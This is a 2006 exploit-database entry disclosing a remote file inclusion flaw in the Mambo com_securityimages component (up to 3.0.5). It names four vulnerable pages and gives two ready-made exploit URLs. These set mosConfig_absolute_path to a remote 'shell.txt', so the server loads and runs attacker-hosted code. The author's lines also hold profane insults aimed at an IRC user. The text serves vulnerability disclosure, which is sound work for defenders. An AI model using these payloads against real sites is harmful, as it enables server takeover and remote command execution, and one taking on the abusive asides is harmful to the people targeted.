Mambo Security Images Component <= 3.0.5 Inclusion Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Mambo Security Images Component <= 3.0.5 Inclusion Vulnerabilities
# Published : 2006-07-28
# Author : Drago84
# Previous Title : vbPortal 3.0.2 <= 3.6.0 b1 (cookie) Remote Code Excution Exploit
# Next Title : Mambo MGM Component <= 0.95r2 Remote Inclusion Vulnerability

# http://forge.joomla.org/sf/projects/com_securityimages

##### Marckusbest is the Best lamah of irc, fuck you
##########
com_securityimages Mambo  Remote File Include
------------------------------------------------------------------------------------
Bug Found by: Drago84
greetz: Exclusive Security
This bug allows a remote atacker to execute commands via
rfi

page:
client.php
configinsert.php
lang.php
server.php

expl:
http://web/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://shell.txt
http://web/components/com_securityimages/lang.php?mosConfig_absolute_path=http://shell.txt

########## MarckusBest Fottiti
#############################

# www.Syue.com [2006-07-28]